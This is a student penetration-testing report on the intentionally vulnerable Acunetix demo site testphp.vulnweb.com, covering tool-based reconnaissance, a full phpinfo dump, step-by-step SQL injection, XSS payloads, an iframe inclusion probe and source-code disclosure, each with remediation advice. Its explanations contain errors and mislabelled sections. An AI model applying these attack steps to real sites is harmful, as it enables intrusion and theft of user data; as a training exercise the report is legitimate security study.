MINI PROJECT

Project 14 website: http://testphp.vulnweb.com/

SUBMITTED TO: - SUBMITTED BY: -

IBM NARENDRA PAL (GROUP-14)

University Roll No.-181530023
 ABSTRACT

As many Web applications are developed daily and used extensively. It becomes important for developers and
testers to improve these application securities. Pen testing, is a technique that helps developers and testers to
ensure that the security levels of their Web application are at acceptable level to be used safely. Different tools
are available for pen testing Web application; in this paper we have used many tools like
dirb,dirbuster,nmap,nikto and burpsuit etc for the enumeration of vulnerabilities in the given Web site -
http://testphp.vulnweb.com/
 Reconnaissance
Host Discovery
One of the very first steps in any network reconnaissance mission is to reduce a (sometimes huge) set of IP
ranges into a list of active or interesting hosts. Scanning every port of every single IP address is slow and
usually unnecessary. Of course what makes a host interesting depends greatly on the scan purposes. Network
administrators may only be interested in hosts running a certain service, while security auditors may care about
every single device with an IP address. An administrator may be comfortable using just an ICMP ping to locate
hosts on his internal network, while an external penetration tester may use a diverse set of dozens of probes in
an attempt to evade firewall restrictions.

Nmap
Nmap is a network mapper that has emerged as one of the most popular, free network discovery tools on the
market. Nmap is now one of the core tools used by network administrators to map their networks. The program
can be used to find live hosts on a network, perform port scanning, ping sweeps, OS detection, and version
detection.
A number of recent cyberattacks have re-focused attention on the type of network auditing that Nmap provides.
Analysts have pointed out that the recent Capital One hack, for instance, could have been detected sooner if
system administrators had been monitoring connected devices.
 Web Server Scanning with Nikto Scanner
There is a number of online vulnerability scanner to test your web applications on the Internet. However, if you
are looking to test Intranet applications or in-house applications, then you can use the Nikto web scanner.

Nikto is an open-source scanner and you can use it with any web servers (Apache, Nginx, IHS, OHS, Litespeed,
etc.). Sounds like a perfect in-house tool for web server scanning. It is capable of scanning for over 6700
items to detect misconfiguration, risky files, etc. and some of the features include;

You can save the report in HTML, XML, CSV

It supports SSL

Scan multiple ports on the server

Find subdomain

Apache user enumeration

Checks for outdated components

Detect parking sites

Using Nikto Scan in Kali linux

Go to Applications >> Vulnerability Analysis and click nikto

 Directory scanning with gobuster, dirbuster and dirb
DIRB
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by
launching a dictionary based attack against a web server and analyzing the response.

DIRB comes with a set of preconfigured attack wordlists for easy usage but you can use your custom wordlists.
Also DIRB sometimes can be used as a classic CGI scanner, but remember is a content scanner not a
vulnerability scanner.

DIRB main purpose is to help in professional web application auditing. Specially in security related testing. It
covers some holes not covered by classic web vulnerability scanners. DIRB looks for specific web objects that
other generic CGI scanners can’t look for. It doesn’t search vulnerabilities nor does it look for web contents that
can be vulnerable.
GOBUSTER
Some of the directories and files found during dirbuster scan in the given website are as follows: -

Directories found during testing:

Dirs found with a 200 response:

/images/

/admin/

/pictures/

/AJAX/

/Mod_Rewrite_Shop/

/hpp/

/Flash/

/Mod_Rewrite_Shop/images/

/secured/

Dirs found with a 403 response:

/cgi-bin/

Files found during testing:

Files found with a 200 response:

/index.php

/search.php

/login.php

/product.php

/disclaimer.php

/signup.php

/categories.php

/cart.php

/artists.php

/guestbook.php

/AJAX/index.php

/Mod_Rewrite_Shop/index.php

/Flash/add.swf

/hpp/index.php

/AJAX/categories.php

/Mod_Rewrite_Shop/buy.php
/Mod_Rewrite_Shop/details.php

/logout.php

/hpp/test.php

/404.php

/AJAX/titles.php

/Mod_Rewrite_Shop/rate.php

/AJAX/artists.php

/hpp/params.php

/secured/index.php

Files found with a 302 response:

/comment.php

/userinfo.php

/redir.php

DIRBUSTER
One of the first steps in attacking a web application is enumerating hidden directories and files. Doing so
can often yield valuable information that makes it easier to execute a precise attack, leaving less room for
errors and wasted time. There are many tools available to do this, but not all of them are created equally.
Gobuster, a directory scanner written in Go, is definitely worth exploring.

Traditional directory brute-force scanners like DirBuster and DIRB work just fine, but can often be slow

and prone to errors. Gobuster is a Go implementation of these tools and is offered in a convenient
command-line format.

The main advantage Gobuster has over other directory scanners is speed. As a programming language, Go is
known to be fast. It also has excellent support for concurrency so that Gobuster can take advantage of
multiple threads for faster processing.

The one downfall of Gobuster, though, is the lack of recursive directory searching. For directories more than
one level deep, another scan will be needed, unfortunately. Often this isn't that big of a deal, and other
scanners can step up and fill in the gaps for Gobuster in this area.
PHP VERSION
url:

http://testphp.vulnweb.com/secured/phpinfo.php

Sensitive informations:

This page may output a large amount of information about the current state of PHP using phpinfo() function.
This includes information about PHP compilation options and extensions, the PHP version, server information
and environment (if compiled as a module), the PHP environment, OS version information, paths, master and
local values of configuration options, HTTP headers, and the PHP License. Remediation Remove the file from
production systems.

PHP Version 5.1.6

FreeBSD svn.local 6.2-RELEASE FreeBSD 6.2-RELEASE #0:

Fri Jan 12 10:40:27 UTC 2007
System [email protected]:/usr/obj/usr/src/sys/GENERIC i386

Build Date Jul 30 2007 12:20:01

'./configure' '--enable-versioning' '--enable-memory-limit' '--

with-layout=GNU' '--with-config-file-scan-
dir=/usr/local/etc/php' '--disable-all' '--enable-libxml' '--with-
libxml-dir=/usr/local' '--enable-reflection' '--enable-spl' '--
program-prefix=' '--enable-fastcgi' '--with-
apxs2=/usr/local/sbin/apxs' '--with-regex=php' '--with-zend-
Configure vm=CALL' '--disable-ipv6' '--prefix=/usr/local' 'i386-portbld-
Command freebsd6.2'

Server API Apache 2.0 Handler

Virtual
Directory
Support Disabled

Configuration
File (php.ini)
Path /usr/local/etc/php.ini

Scan this dir /usr/local/etc/php

for
additional .ini
files

additional .ini
files parsed /usr/local/etc/php/extensions.ini

PHP API 20041225

PHP
Extension 20050922

Zend
Extension 220051025

Debug Build No

Thread Safety Disabled

Zend Memory
Manager Enabled

IPv6 Support Disabled

Registered
PHP Streams php, file, http, ftp, https, ftps, compress.zlib

Registered
Stream Socket
Transports tcp, udp, unix, udg, ssl, sslv3, sslv2, tls

Registered string.rot13, string.toupper, string.tolower, string.strip_tags,

Stream Filters convert.*, consumed, convert.iconv.*, zlib.*

This program makes use of the Zend Scripting Language

Engine:
Zend Engine v2.1.0, Copyright (c) 1998-2006 Zend Technologies

PHP Credits
Configuration
PHP Core

Directive Local Value Master Value

allow_call_time_pass_refere
nce On On
allow_url_fopen On On

always_populate_raw_post_
data Off Off

arg_separator.input & &

arg_separator.output & &

asp_tags Off Off

auto_append_file no value no value

auto_globals_jit On On

auto_prepend_file no value no value

Browscap no value no value

default_charset no value no value

default_mimetype text/html text/html

define_syslog_variables Off Off

disable_classes no value no value

disable_functions no value no value

display_errors On On

display_startup_errors Off Off

doc_root no value no value

docref_ext no value no value

docref_root no value no value

enable_dl On On

error_append_string no value no value

error_log no value no value

error_prepend_string no value no value

error_reporting 2039 2039

expose_php On On

/ /
usr/local/lib/php/200509 usr/local/lib/php/200509
extension_dir 22 22
file_uploads On On

highlight.bg #FFFFFF #FFFFFF

highlight.comment #FF8000 #FF8000

highlight.default #0000BB #0000BB

highlight.html #000000 #000000

highlight.keyword #007700 #007700

highlight.string #DD0000 #DD0000

html_errors On On

ignore_repeated_errors Off Off

ignore_repeated_source Off Off

ignore_user_abort Off Off

implicit_flush Off Off

include_path .: .:

log_errors Off Off

log_errors_max_len 1024 1024

magic_quotes_gpc Off Off

magic_quotes_runtime Off Off

magic_quotes_sybase Off Off

mail.force_extra_parameters no value no value

max_execution_time 30 30

max_input_time 60 60

memory_limit 8M 8M

open_basedir no value no value

output_buffering no value no value

output_handler no value no value

post_max_size 8M 8M

precision 12 12

realpath_cache_size 16K 16K

realpath_cache_ttl 120 120

register_argc_argv On On

register_globals Off Off

register_long_arrays On On

report_memleaks On On

report_zend_debug On On

safe_mode Off Off

safe_mode_exec_dir no value no value

safe_mode_gid Off Off

safe_mode_include_dir no value no value

sendmail_from no value no value

sendmail_path /usr/sbin/sendmail -t -i  /usr/sbin/sendmail -t -i 

serialize_precision 100 100

short_open_tag On On

SMTP localhost localhost

smtp_port 25 25

sql.safe_mode Off Off

track_errors Off Off

unserialize_callback_func no value no value

upload_max_filesize 2M 2M

upload_tmp_dir no value no value

user_dir no value no value

variables_order EGPCS EGPCS

xmlrpc_error_number 0 0

xmlrpc_errors Off Off

y2k_compliance On On

zend.ze1_compatibility_mod Off Off

e

apache2handler
Apache Apache/2.2.3 (FreeBSD) DAV/2 PHP/5.1.6 mod_ssl/2.2.3
Version OpenSSL/0.9.7e-p1

Apache API
Version 20051115

Server
Administrator [email protected]

Hostname:Port acuart:0

User/Group www(80)/80

Max Requests Per Child: 10000 - Keep Alive: on - Max Per Connection: 100

Timeouts Connection: 300 - Keep-Alive: 5

Virtual Server Yes

Server Root /usr/local

core prefork http_core mod_so mod_authn_file

mod_authn_dbm mod_authn_anon mod_authn_default
mod_authn_alias mod_authz_host mod_authz_groupfile
mod_authz_user mod_authz_dbm mod_authz_owner
mod_authz_default mod_auth_basic mod_auth_digest
mod_file_cache mod_cache mod_disk_cache mod_include
mod_filter mod_charset_lite mod_deflate mod_log_config
mod_logio mod_env mod_mime_magic mod_cern_meta
mod_expires mod_headers mod_usertrack mod_setenvif
mod_version mod_ssl mod_mime mod_dav mod_status
mod_autoindex mod_asis mod_info mod_cgi mod_dav_fs
mod_vhost_alias mod_negotiation mod_dir mod_imagemap
Loaded mod_actions mod_speling mod_userdir mod_alias mod_rewrite
Modules mod_php5

Directive Local Value Master Value

engine 1 1

last_modified 0 0

xbithack 0 0

ctype
ctype functions Enabled
curl
CURL support Enabled

CURL Information libcurl/7.15.5 OpenSSL/0.9.7e zlib/1.2.3

Directive Local Value Master Value

date.default_latitude 31.7667 31.7667

date.default_longitude 35.2333 35.2333

date.sunrise_zenith 90.583333 90.583333

date.sunset_zenith 90.583333 90.583333

date.timezone no value no value

dom
DOM/XML Enabled

DOM/XML API Version 20031129

libxml Version 2.6.26

HTML Support Enabled

XPath Support Enabled

XPointer Support Enabled

Schema Support Enabled

RelaxNG Support Enabled

exif
EXIF Support Enabled

1.4 $Id: exif.c,v 1.173.2.5 2006/04/10 18:23:24 helly

EXIF Version Exp $

Supported EXIF
Version 0220

Supported filetypes JPEG,TIFF

ftp
FTP support Enabled

gd
GD Support Enabled

GD Version bundled (2.0.28 compatible)

FreeType Support Enabled

FreeType Linkage with freetype

FreeType Version 2.2.1

T1Lib Support Enabled

GIF Read Support Enabled

GIF Create Support Enabled

JPG Support Enabled

PNG Support Enabled

WBMP Support Enabled

XPM Support Enabled

XBM Support Enabled

libxml
libXML support Active

libXML Version 2.6.26

libXML streams Enabled

mssql
MSSQL Support enabled

Active Persistent Links 0

Active Links 0

Library version FreeTDS

mysql
MySQL Support enabled

Active Persistent Links 0

Active Links 0

Client API version 5.1.11-beta

MYSQL_MODULE_TYPE no value

MYSQL_SOCKET /tmp/mysql.sock

MYSQL_INCLUDE no value

MYSQL_LIBS no value

Directive Local Value Master Value

mysql.allow_persistent On On

mysql.connect_timeout 60 60

mysql.default_host no value no value

mysql.default_password no value no value

mysql.default_port no value no value

mysql.default_socket no value no value

mysql.default_user no value no value

mysql.max_links Unlimited Unlimited

mysql.max_persistent Unlimited Unlimited

mysql.trace_mode Off Off

openssl
OpenSSL support Enabled

OpenSSL Version OpenSSL 0.9.7e-p1 25 Oct 2004

posix
Revision $Revision: 1.70.2.3 $

Reflection
Reflectio
n Enabled
 $Id: php_reflection.c,v 1.164.2.33 2006/03/29 14:28:42 tony2001
Version Exp $

session
Session Support Enabled

Registered save handlers files user

Registered serializer handlers php php_binary

Directive Local Value Master Value

session.auto_start Off Off

session.bug_compat_42 On On

session.bug_compat_warn On On

session.cache_expire 180 180

session.cache_limiter nocache nocache

session.cookie_domain no value no value

session.cookie_lifetime 0 0

session.cookie_path / /

session.cookie_secure Off Off

session.entropy_file no value no value

session.entropy_length 0 0

session.gc_divisor 100 100

session.gc_maxlifetime 1440 1440

session.gc_probability 1 1

session.hash_bits_per_character 4 4

session.hash_function 0 0

session.name PHPSESSID PHPSESSID

session.referer_check no value no value

session.save_handler files files

session.save_path no value no value

session.serialize_handler php php

session.use_cookies On On

session.use_only_cookies Off Off

session.use_trans_sid 0 0

SQLite
SQLite support Enabled

PECL Module 2.0-dev $Id: sqlite.c,v 1.166.2.13 2006/04/18 14:30:15

version iliaa Exp $

SQLite Library 2.8.17

SQLite Encoding iso8859

Directive Local Value Master Value

sqlite.assoc_case 0 0

standard
Regex Library Bundled library enabled

Dynamic Library Support Enabled

Path to sendmail /usr/sbin/sendmail -t -i

Directive Local Value Master Value

assert.active 1 1

assert.bail 0 0

assert.callback no value no value

assert.quiet_eval 0 0

assert.warning 1 1
auto_detect_line_
endings 0 0

default_socket_ti
meout 60 60

safe_mode_allow
ed_env_vars PHP_ PHP_

safe_mode_prote
cted_env_vars LD_LIBRARY_PATH LD_LIBRARY_PATH

a=href,area=href,frame=src,in a=href,area=href,frame=src,in
url_rewriter.tags put=src,form=,fieldset= put=src,form=,fieldset=

user_agent no value no value

xml
XML Support active

XML Namespace Support active

libxml2 Version 2.6.26

xmlreader
XMLReader Enabled

xmlwriter
XMLWriter Enabled

xsl
XSL enabled

libxslt Version 1.1.17

libxslt compiled against libxml Version 2.6.26

EXSLT enabled

libexslt Version 1.1.17

Additional Modules
Module Name

Environment
Variable Value

LD_LIBRARY_PATH /usr/local/lib:

HOME /

PATH /sbin:/bin:/usr/sbin:/usr/bin

PHP Variables
Variable Value

_SERVER["HTTP_HO
ST"] Acuart

_SERVER["HTTP_USE Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;

R_AGENT"] rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11

_SERVER["HTTP_AC text/xml,application/xml,application/xhtml+xml,text/h
CEPT"] tml;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

_SERVER["HTTP_AC
CEPT_LANGUAGE"] en-us,en;q=0.5

_SERVER["HTTP_AC
CEPT_ENCODING"] gzip,deflate

_SERVER["HTTP_AC
CEPT_CHARSET"] ISO-8859-1,utf-8;q=0.7,*;q=0.7

_SERVER["HTTP_KEE
P_ALIVE"] 300

_SERVER["HTTP_CO
NNECTION"] keep-alive

_SERVER["PATH"] /sbin:/bin:/usr/sbin:/usr/bin

_SERVER["SERVER_S
IGNATURE"] no value

_SERVER["SERVER_S Apache/2.2.3 (FreeBSD) DAV/2 PHP/5.1.6

OFTWARE"] mod_ssl/2.2.3 OpenSSL/0.9.7e-p1

_SERVER["SERVER_
NAME"] Acuart

_SERVER["SERVER_
ADDR"] 192.168.0.5

_SERVER["SERVER_P
ORT"] 80

_SERVER["REMOTE_ 192.168.0.26
ADDR"]

_SERVER["DOCUME
NT_ROOT"] /var/www/acuart/

_SERVER["SERVER_
ADMIN"] [email protected]

_SERVER["SCRIPT_FI
LENAME"] /var/www/acuart/secured/phpinfo.php

_SERVER["REMOTE_
PORT"] 11493

_SERVER["GATEWA
Y_INTERFACE"] CGI/1.1

_SERVER["SERVER_P
ROTOCOL"] HTTP/1.1

_SERVER["REQUEST
_METHOD"] GET

_SERVER["QUERY_S
TRING"] no value

_SERVER["REQUEST
_URI"] /secured/phpinfo.php

_SERVER["SCRIPT_N
AME"] /secured/phpinfo.php

_SERVER["PHP_SELF
"] /secured/phpinfo.php

_SERVER["REQUEST
_TIME"] 1201867164

_SERVER["argv"] Array

_SERVER["argc"] 0

_ENV["LD_LIBRARY_
PATH"] /usr/local/lib:

_ENV["HOME"] /

_ENV["PATH"] /sbin:/bin:/usr/sbin:/usr/bin
PHP License
This program is free software; you can redistribute it and/or modify it under the
terms of the PHP License as published by the PHP Group and included in the
distribution in the file: LICENSE
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
If you did not receive a copy of the PHP license, or have any questions about
PHP licensing, please contact [email protected].

WEB VULNERABILITIES
On scanning the given website we founded many web vulnerabilities some are listed below

1.SQL INJECTION
Description: - SQL Injection (SQL) is a type of web application vulnerability where an attacker can manipulate
and submit a SQL command to retrieve the database information. This type of attack mostly occurs when a web
application executes by using the user-provided data without validating or encoding it.
This attack can give access to sensitive information like customer information credit card numbers, trade secrets,
personal data and more.
This attack allows an attacker to add, modify and delete data stored in the database.

How to Perform This Attack?

Steps to follow – (Performing this attack on a intentionally vulnerable application -
http://test.vulnweb.com/listproducts.php?cat=1)
1. Open the above link in the Firefox browser

2. To test if this web application is vulnerable to SQL injection or not we put a quote(’) at the end of URL

As error occurs here, this means this website is vulnerable to SQL injection attack.
3. To know how many columns are present in the table we use order by

We get to know that this page has 11 columns in the table

4. To know which column is vulnerable in the table we use union query

We get to know that 7 and 9 column are vulnerable

5. To know the database name we use database() at the place of column number

We get to know that acuart is the database name

6. To know the tables name present in the database we do the following

We get to know various tables name but from these users table might be useful to us
7. To know the columns name we do the following

These columns are very useful to use to get sensitive information

 8. To fetch the data we do the following

We get to know username and password of user.

We have performed Brute Force Attack!!!!

Remediation
1. Whitelisting is the best practice to validate input against blacklisting whenever it is practicable.
2. Do not create SQL queries with string concatenation. Instead use prepared statements or stored
procedures.

2.File Upload
File Inclusion vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion”
mechanism implemented in the target application. The vulnerability occurs due to the use of user-supplied input
without proper validation.

This can lead to something as outputting the contents of the file, but depending on the severity, it can also lead
to:
1.Code execution on the web server
2.Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site
scripting (XSS)
3.Denial of Service (DoS)
4.Sensitive Information Disclosure

Local file inclusion (LFI) is the process of including files, that are already locally present on the server,
through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability
occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is
not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected.
Directory:
/showimage.php?file=./pictures/7.jpg
url: http://testphp.vulnweb.com/showimage.php?file=./pictures/7.jpg

go to:
search in burpsuite to modify the request header i.e.
file=

The go to any link and then changes the file path to check whether it has file upload vulnerability or not
Send this request to the repeater to modify the request.

Apply this payload:

<iframe src=” https://www.3schools.com”> </iframe>
Modifies request:

Response:

Hence this response shows warning i.e. unable to access that means it does not have file upload vulnerability.

Remediation
As the main cause is improper input validation, suggestions mainly revolve around sanitizing the input received.
1. Accept only characters and numbers for file names (A-Z 0-9). Blacklist all the special characters
which are not of any use in a filename.
 2. Limit the API to allow inclusion of files only from one allowed directory so that directory traversal
can also be avoided.

3.Http parameter pollution attack

Client-side HTTP parameter pollution (HPP) vulnerabilities arise when an application embeds user input in
URLs in an unsafe manner. An attacker can use this vulnerability to construct a URL that, if visited by another
application user, will modify URLs within the response by inserting additional query string parameters and
sometimes overriding existing ones. This may result in links and forms having unexpected side effects. For
example, it may be possible to modify an invitation form using HPP so that the invitation is delivered to an
unexpected recipient.
The security impact of this issue depends largely on the nature of the application functionality. Even if it has no
direct impact on its own, an attacker may use it in conjunction with other vulnerabilities to escalate their overall
severity.

Then check response

Then check response in browser.

Then click on link1 and link2
Then we get it works

We surely changed or injected payload in the http request.

Remediation
Ensure that user input is URL-encoded before it is embedded in a URL.
Now intercept the request in burbsuite and then send it to the repeater and perform modification or manipulating
http request by <script>alert(1)</script>

4.Cross Site Scripting (XSS)

Overview
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise
benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code,
generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed
are quite widespread and occur anywhere a web application uses input from a user within the output it generates
without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way
to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a
trusted source, the malicious script can access any cookies, session tokens, or other sensitive information
retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

How to perform This Attack?

Steps to follow – (Performing this attack on a intentionally vulnerable application - http://test.vulnweb.com/)

1. Open the above link in the Firefox browser

2. To test if this web application is vulnerable to XSS or not we put a Script in search bar

(“<script>alert(“Hacked”)</script>”)

(http://test.vulnweb.com/)
3. And also put the script in Message

(http://test.vulnweb.com/guestbook.php)
4.This type of script is also work in comment bar

(http://test.vulnweb.com/comment.php?aid=1)
 Remediations

Sanitizing. A third way to prevent cross-site scripting attacks is to sanitize user input. Sanitizing data is a strong
defense, but should not be used alone to battle XSS attacks. It’s totally possible you’ll find the need to use all
three methods of prevention in working towards a more secure application.

5.SOURCE CODE DISCLOSURE

Obtaining the source code of server-side scripts grants the attacker deeper knowledge of the logic behind the
web application, how the application handles requests and their parameters, the structure of the database,
vulnerabilities in the code and source code comments.

Url:

http://testphp.vulnweb.com/index.bak

<?PHP require_once("database_connect.php"); ?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php"
codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->

<title>Home of WASP Art</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
 else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body>
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead">
<h1 id="siteName">ACUNETIX ART</h1>
<h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6>
<div id="globalNav">
<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> |
<a href="guestbook.php">guestbook</a>
</div>
</div>
<!-- end masthead -->

<!-- begin content -->

<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
<h2 id="pageName">welcome to our page</h2>
<div class="story">
<h3>Test site for WASP.</h3>
</div>
</div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="navBar">
<div id="search">
<form action="search.php" method="post">
<label>search art</label>
<input name="searchFor" type="text" size="10">
<input name="goButton" type="submit" value="go">
</form>
</div>
<div id="sectionLinks">
<ul>
<li><a href="categories.php">Browse categories</a></li>
<li><a href="artists.php">Browse artists</a></li>
<li><a href="cart.php">Your cart</a></li>
<li><a href="login.php">Signup</a></li>
<li><a href="userinfo.php">Your profile</a></li>
<li><a href="guestbook.php">Our guestbook</a></li>
<?PHP if (isset($_COOKIE["login"]))echo '<li><a href="../logout.php">Logout</a>'; ?></li>
</ul>
</div>
<div class="relatedLinks">
<h3>Links</h3>
<ul>
<li><a href="http://www.acunetix.com">Security art</a></li>
<li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li>
</ul>
</div>
<div id="advert">
<p><img src="images/add.jpg" alt="" width="107" height="66"></p>
</div>
</div>

<!--end navbar -->

<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="redir.php?r=index.php">Site
Map</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:[email protected]">Contact
Us</a> | &copy;2004
Acunetix Ltd
</div>
<br>
</div>
</body>
<!-- InstanceEnd --></html>

This code shows that this website uses php in database side .

2.
url:
http://testphp.vulnweb.com/pictures/wp-config.bak

gain

This shows that source code by database .

Due to this information attacker can exploit the database and can gain acces to the database and modify the
entries or delete .

Remediation:

Review the cause of the code disclosure and prevent it from happening.